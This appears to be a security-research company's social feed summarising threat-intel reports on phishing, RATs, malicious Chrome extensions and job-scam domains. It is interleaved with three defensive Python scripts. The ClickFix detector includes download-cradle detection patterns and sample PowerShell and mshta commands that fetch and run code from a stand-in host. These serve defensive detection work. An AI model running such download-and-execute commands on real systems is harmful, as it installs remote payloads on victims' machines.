SecuritySnacks

172 Followers
22 Following
55 Posts
Proactive defense starts with bite-sized #threatintel from the @DomainTools Security Research team. #SnackThePlanet #infosec
Website: https://dti.domaintools.com/

Cybercrime group FIN6 (aka Skeleton Spider) is leveraging trusted cloud services like AWS to deliver malware through fake job applications.

Our latest analysis breaks down:
🔹 How attackers use LinkedIn & Indeed to build trust
🔹 The use of resume-themed phishing lures
🔹 Cloud-hosted infrastructure that evades detection
🔹 The delivery of the More_eggs backdoor via .LNK files
🔹 Key defense strategies for recruiters and security teams

This campaign is a masterclass in low-complexity, high-evasion phishing.

📖 Read the full breakdown: https://dti.domaintools.com/skeleton-spider-trusted-cloud-malware-delivery/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Skeleton-Spider

#CyberSecurity #ThreatIntel #FIN6 #Phishing #CloudSecurity #MalwareAnalysis #InfoSec #SkeletonSpider

We hope you enjoyed @danonsecurity and Jon DiMaggio’s presentation on Mapping Hidden Alliances in Russian-Affiliated Ransomware at #SleuthCon. Key takeaways from the mapping include:

🔹Reuse does not equal identity. Different groups may share code or have human overlap but are not the same entity.
🔹Group labeling is increasingly obsolete.
🔹The modern threat landscape is best understood by tracking clusters of activity, not just named groups, and focusing on similar activity rather than specific names.

Find the writeup and infographic here: https://dti.domaintools.com/mapping-hidden-alliances-russian-affiliated-ransomware/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Russian-Ransomware

DomainTools Investigations’ (DTI) latest analysis uncovers a technically sophisticated malware campaign that uses fake CAPTCHAs and spoofed document verification pages (like Docusign) to trick users into self-infecting their machines with the NetSupport RAT.

Key tactics include:

🔹 Clipboard poisoning via fake CAPTCHA pages
🔹Multi-stage PowerShell downloaders
🔹Spoofed Gitcodes and Docusign domains
🔹Infrastructure overlap with known threat groups like SocGholish, FIN7 and STORM-0408

Read the full breakdown including security recommendations here: https://dti.domaintools.com/how-threat-actors-exploit-human-trust/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Prove-You-Are-Human

#ThreatIntelligence #CyberSecurity #SocGholish #Malware
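Clipboard poisoning via a fake CAPTCHA (the pattern usually called ClickFix) ends with the victim pressing Win+R and pasting a command the page has put on their clipboard, so the first-stage PowerShell or mshta process is a child of explorer.exe rather than of a browser or mail client. The detection sketch below is an added example written for this page, not DomainTools code and not a description of this specific campaign's command lines. The process-creation events are constructed, and the field names (parent, image, cmdline) are an assumption that maps onto Sysmon Event ID 1 or Windows 4688 fields.

```python
import re

# Process images that a pasted one-liner typically starts.
LAUNCHERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
             "wscript.exe", "cscript.exe"}
# Script hosts that fetch and run remote content when handed a URL directly.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line indicators: (weight, pattern). Weights are this example's choice.
INDICATORS = {
    "download_cradle": (2, re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|start-bitstransfer|curl|certutil)\b", re.I)),
    "execute_fetched": (2, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    "encoded_command": (3, re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/]{20,}={0,2}", re.I)),
    "hidden_window": (1, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    "remote_url": (1, re.compile(r"https?://", re.I)),
}
ALERT_THRESHOLD = 3


def _basename(path):
    """Last path component, lower-cased, so rules do not depend on install paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    image = _basename(event["image"])
    if image not in LAUNCHERS:
        return 0, []
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(event["cmdline"])]
    score = sum(INDICATORS[name][0] for name in hits)
    # mshta/wscript/cscript given a URL fetch and execute it themselves; no cradle text needed.
    if image in SCRIPT_HOSTS and "remote_url" in hits:
        hits.append("script_host_remote_content")
        score += 3
    return score, hits


def classify(event):
    """'clickfix_candidate' when a scored launcher is a child of explorer.exe (the Run dialog
    and desktop shell), 'suspicious_launcher' for the same command line under any other
    parent, otherwise 'benign'."""
    score, _ = score_event(event)
    if score < ALERT_THRESHOLD:
        return "benign"
    if _basename(event["parent"]) == "explorer.exe":
        return "clickfix_candidate"
    return "suspicious_launcher"


def scan(events):
    """Alerts for every non-benign event as (verdict, indicators, command line)."""
    out = []
    for ev in events:
        verdict = classify(ev)
        if verdict != "benign":
            out.append((verdict, score_event(ev)[1], ev["cmdline"]))
    return out


# Constructed sample events; the .invalid hostnames are reserved and never resolve.
SAMPLE_EVENTS = [
    # Pasted into Win+R after a fake CAPTCHA: hidden PowerShell download-and-run cradle.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://verify.example.invalid/s | iex"'},
    # Same delivery, HTA variant: mshta fetches and runs the remote script directly.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://verify.example.invalid/captcha.hta"},
    # Encoded command spawned by an Office process: suspicious, but not the Run-dialog path.
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAp"},
    # An admin running a local script from the shell: no cradle, no alert.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    # Not a launcher at all.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for verdict, hits, cmdline in scan(SAMPLE_EVENTS):
        print(verdict, hits, cmdline)
```

The parent-process check is what separates the ClickFix path from the far more common "PowerShell under an Office process" case, which still alerts but under a different label; tune the weights and threshold against your own baseline of interactive PowerShell use before deploying.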

🎵 Ladies and gentlemen, this is Newsletter No. 5

Daniel Schwalbe, CISO and Head of Investigations, shares the 5th iteration of his newsletter this week. It highlights research published by the DomainTools Investigations team including:

🔹 An analysis on a malicious campaign using a fake website to spread VenomRAT
🔹 An unknown actor continuously creating malicious Chrome Browser extensions
🔹 How bad actors take advantage of viral media events

Find it here: https://www.domaintools.com/resources/blog/domaintools-investigations-may-2025-newsletter/?utm_source=Mastodon&utm_medium=Social&utm_campaign=DTI-Newsletter-May

🔥 Hot off the presses!

DomainTools Investigations shares that a spoofed antivirus download page is delivering VenomRAT, StormKitty, and SilentTrinity—a powerful combo for credential theft, persistence, and long-term access.

🔎 We traced the infrastructure, payloads, and attacker tactics.

Full breakdown: https://dti.domaintools.com/venomrat/?utm_source=Mastodon&utm_medium=Social&utm_campaign=VenomRAT

#CyberSecurity #ThreatIntel #MalwareAnalysis #Infosec

In an effort to share not just what we’re observing on the net, but what we’re reading and listening to elsewhere, @neurovagrant compiles an abbreviated digest of media being passed around within our team as well as what we’re seeing in the security community at large.

This week we're enjoying works from:

🔸 Maltego's Human Element Podcast (hosted by Ben April)
🔸 Citizen Lab (Rebekah Brown, Marcus Michaelsen, Matt Brooks, and Siena Anstis)
🔸NextGov (David DiMolfetta)
🔸Proofpoint (Genina Po, Kyle Cucci, Selena Larson, and the Proofpoint Threat Research Team)

Find the full reading list here: https://dti.domaintools.com/cybersecurity-reading-list-week-of-2025-05-19/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Reading-List-May


Since February 2024, a stealthy threat actor has launched 100+ fake websites and Chrome extensions that appear helpful, but secretly steal data, hijack sessions, and inject malicious code.
🔍 These extensions:

🔹 Masquerade as AI tools, VPNs, analytics, and more
🔹Request excessive permissions
🔹Connect to attacker-controlled servers
🔹Execute arbitrary code on every site you visit

🛡️ Protect Yourself:
🔹Only install extensions from verified developers
🔹Review permissions carefully
🔹Keep your browser & antivirus updated
🔹Regularly audit your installed extensions

Learn more from DomainTools Investigations here: https://dti.domaintools.com/dual-function-malware-chrome-extensions/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Chrome-Extensions

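"Review permissions carefully" and "regularly audit your installed extensions" are easier to act on with a script that reads each extension's manifest.json and flags the combination the post describes: broad host access plus the permissions that allow code injection, cookie theft or request tampering. The audit below is an added example for this page, not DomainTools code; the two manifests are constructed, and the permission-to-risk mapping and "high/medium/low" bands are this example's own judgement rather than a Chrome or DomainTools classification.

```python
import json
from pathlib import Path

# Host patterns that mean "every site you visit".
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Permission -> what it lets an extension do (why a reviewer should care).
RISKY_PERMISSIONS = {
    "cookies": "read and set cookies for granted hosts (session hijacking)",
    "scripting": "inject JavaScript/CSS into pages at runtime",
    "webRequest": "observe and modify network requests",
    "webRequestBlocking": "block or redirect network requests",
    "declarativeNetRequest": "rewrite or redirect requests by rule",
    "tabs": "see URLs and titles of every open tab",
    "history": "read browsing history",
    "debugger": "attach to tabs with the DevTools protocol",
    "nativeMessaging": "talk to a native binary outside the sandbox",
    "proxy": "route all browser traffic through a chosen proxy",
    "management": "enable, disable or uninstall other extensions",
    "clipboardRead": "read clipboard contents",
}
# Any of these combined with broad host access puts the extension in the 'high' band.
HIGH_WITH_BROAD = {"cookies", "scripting", "webRequest", "webRequestBlocking", "debugger", "proxy"}


def host_scope(manifest):
    """Every host pattern the extension can touch: MV2 lists them in 'permissions',
    MV3 in 'host_permissions', and content scripts declare their own 'matches'."""
    patterns = set()
    patterns.update(p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>")
    patterns.update(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        patterns.update(cs.get("matches", []))
    return patterns


def audit_manifest(manifest):
    """Return {'name', 'level', 'broad_hosts', 'findings'} for one parsed manifest.json."""
    perms = set(manifest.get("permissions", []))
    broad = host_scope(manifest) & BROAD_HOSTS
    cs_broad = any(set(cs.get("matches", [])) & BROAD_HOSTS
                   for cs in manifest.get("content_scripts", []))
    findings = [f"{p}: {RISKY_PERMISSIONS[p]}" for p in sorted(perms & set(RISKY_PERMISSIONS))]
    if cs_broad:
        findings.append("content script runs on every site you visit")
    if broad and "cookies" in perms:
        findings.append("can read session cookies for every site")
    if broad and ("scripting" in perms or cs_broad):
        findings.append("can execute arbitrary code on every site you visit")
    if broad and (perms & HIGH_WITH_BROAD or cs_broad):
        level = "high"
    elif findings:
        level = "medium"
    else:
        level = "low"
    return {"name": manifest.get("name", "?"), "level": level,
            "broad_hosts": sorted(broad), "findings": findings}


def find_manifests(profile_dir):
    """Yield (path, manifest) for each installed extension in a Chrome profile directory.
    Chrome stores them as <profile>/Extensions/<extension id>/<version>/manifest.json.
    A name like __MSG_appName__ is localized and has to be resolved from _locales/."""
    for path in Path(profile_dir).glob("Extensions/*/*/manifest.json"):
        with open(path, encoding="utf-8") as fh:
            yield path, json.load(fh)


# Constructed manifests: a lookalike "AI tool" with the dangerous combination, and a narrow one.
SUSPECT = {
    "manifest_version": 3, "name": "AI Page Summarizer Pro", "version": "1.4.2",
    "permissions": ["cookies", "scripting", "tabs", "webRequest", "storage"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"], "run_at": "document_start"}],
    "background": {"service_worker": "bg.js"},
}
NARROW = {
    "manifest_version": 3, "name": "Dark Mode for Example", "version": "0.3.0",
    "permissions": ["storage"],
    "content_scripts": [{"matches": ["https://example.com/*"], "css": ["dark.css"]}],
}

if __name__ == "__main__":
    for m in (SUSPECT, NARROW):
        print(json.dumps(audit_manifest(m), indent=2))
```

Point find_manifests at a real profile (for example ~/.config/google-chrome/Default on Linux or %LOCALAPPDATA%\Google\Chrome\User Data\Default on Windows) and feed each manifest to audit_manifest. A "high" result is a prompt to look at what the content script and service worker actually do, not proof of malice: many legitimate password managers and ad blockers legitimately need broad host access.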

Since May 12, DomainTools has tracked 389+ suspicious domains mimicking Spotify targeting tech job-seekers amid a surge in job scams.

These domains show tight clustering across 7 metrics, suggesting a coordinated campaign. Many use Google MX records & are Cloudflare-protected.

Learn more here: https://www.domaintools.com/resources/blog/cluster-of-domains-targeting-spotify-job-seekers/?utm_source=LinkedIn&utm_medium=Social&utm_campaign=Spotify

Find IOCs on GitHub: https://github.com/DomainTools/SecuritySnacks/blob/main/2025/SpotifyJobSeekerTargeting.csv

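The reason 389+ domains read as one campaign rather than 389 coincidences is the clustering: lookalike names that also share registrar, nameserver provider, mail provider and a registration window. The script below is an added example for this page, not DomainTools code, and the fingerprint fields it uses are this example's choice, not the seven metrics referred to in the post. The records are constructed (reserved .invalid names) and stand in for the fields you would pull from WHOIS/RDAP and passive DNS before pivoting.

```python
from collections import defaultdict
from datetime import date

# Digit-for-letter swaps common in typosquats; extend as needed.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})


def normalize_label(label):
    """Lower-case, undo leetspeak and drop separators so 'sp0t-1fy' -> 'spotify'."""
    return label.lower().translate(LEET).replace("-", "").replace("_", "")


def is_lookalike(domain, brand):
    """True when the brand token survives normalization anywhere in the name below the TLD."""
    name = domain.rsplit(".", 1)[0]
    return brand.lower() in normalize_label(name)


def provider(hostname):
    """Crude provider key: last two labels of an MX/NS host ('aspmx.l.google.com' -> 'google.com').
    Assumption: no public-suffix handling, so co.uk-style hosts would need a PSL lookup."""
    return ".".join(hostname.lower().rstrip(".").split(".")[-2:])


def iso_week(created):
    """Registration week as 'YYYY-Www', so a burst of registrations collapses to one key."""
    y, w, _ = date.fromisoformat(created).isocalendar()
    return f"{y}-W{w:02d}"


def fingerprint(rec):
    """Infrastructure fingerprint shared by domains set up the same way in the same week."""
    return (rec["registrar"].lower(), provider(rec["ns"]), provider(rec["mx"]), iso_week(rec["created"]))


def cluster_lookalikes(records, brand, min_size=3):
    """Group brand-lookalike domains by fingerprint; return clusters of at least min_size,
    largest first. Domains that share the fingerprint but do not imitate the brand are
    ignored, since a popular registrar/DNS/mail combination alone proves nothing."""
    groups = defaultdict(list)
    for rec in records:
        if is_lookalike(rec["domain"], brand):
            groups[fingerprint(rec)].append(rec["domain"])
    return [{"fingerprint": fp, "domains": sorted(doms)}
            for fp, doms in sorted(groups.items(), key=lambda kv: -len(kv[1]))
            if len(doms) >= min_size]


# Constructed records; field values imitate real-looking WHOIS/DNS data but are invented.
RECORDS = [
    {"domain": "spotify-careers-apply.invalid", "registrar": "NameCheap",
     "ns": "ada.ns.cloudflare.com", "mx": "aspmx.l.google.com", "created": "2025-05-12"},
    {"domain": "spot1fy-hiring.invalid", "registrar": "namecheap",
     "ns": "bob.ns.cloudflare.com", "mx": "alt1.aspmx.l.google.com", "created": "2025-05-13"},
    {"domain": "jobs-spotify-recruit.invalid", "registrar": "NameCheap",
     "ns": "ada.ns.cloudflare.com", "mx": "aspmx.l.google.com", "created": "2025-05-14"},
    {"domain": "sp0tify-talent.invalid", "registrar": "Namecheap",
     "ns": "cara.ns.cloudflare.com", "mx": "aspmx.l.google.com", "created": "2025-05-16"},
    # Lookalike name, but different infrastructure and months earlier: stays a singleton.
    {"domain": "spotify-fan-wiki.invalid", "registrar": "GoDaddy",
     "ns": "ns1.domaincontrol.com", "mx": "mail.protection.outlook.com", "created": "2025-03-02"},
    # Same fingerprint as the cluster but no brand imitation: excluded.
    {"domain": "bluebird-bakery.invalid", "registrar": "NameCheap",
     "ns": "ada.ns.cloudflare.com", "mx": "aspmx.l.google.com", "created": "2025-05-13"},
]

if __name__ == "__main__":
    for c in cluster_lookalikes(RECORDS, "spotify"):
        print(c["fingerprint"], c["domains"])
```

Cloudflare-fronted hosting and Google MX are so common that the fingerprint only gains meaning in combination with the brand match and the tight registration window; when you run this on a real feed, add fields with more entropy (registrant e-mail hash, SSL certificate issuer and SAN overlap, shared A records) before treating a cluster as one actor.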

Scammers pay attention to headlines just as much as we do, but their motivations are very different.

From the LA wildfires to AI tech breakthroughs, viral events dominate the news cycle—and cybercriminals are quick to exploit them. DomainTools Investigations’ latest research reveals how malicious domains and scam sites surge in the wake of breaking news, targeting unsuspecting users with fake donations, meme coins, and malware.

🔍 Discover:

How scammers use AI to ride the wave of viral media

Real-world examples of fake crypto coins & donation scams

Patterns linking scam sites across global events

📖 Read the full analysis here: https://dti.domaintools.com/scams-malicious-domains-breaking-news/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Breaking-News

#CyberSecurity #ThreatIntel #ScamAlert #BreakingNews #Infosec #Phishing #Malware #CryptoScams


In an effort to share not just what we’re observing on the net, but what we’re reading and listening to elsewhere, @neurovagrant compiles a monthly, abbreviated digest of media being passed around within our team as well as what we’re seeing in the security community at large.

This week we're enjoying works from:
🔸@TalosSecurity - Talos Takes - Year in Review podcast parts 1 and 2
🔸SpyCloud - Exposed Credentials & Ransomware Operations: Using LLMs to Digest 200K Messages from the Black Basta Chats
🔸@404media - 4chan Is Down Following What Looks to Be a Major Hack Spurred By Meme War
🔸Infoblox - Disrupting Fast Flux With Protective DNS
🔸and more!

Find the full cybersecurity reading list here: https://dti.domaintools.com/cybersecurity-reading-list-week-of-2025-04-21/?utm_source=Mastodon&utm_medium=Social&utm_campaign=reading-list-april
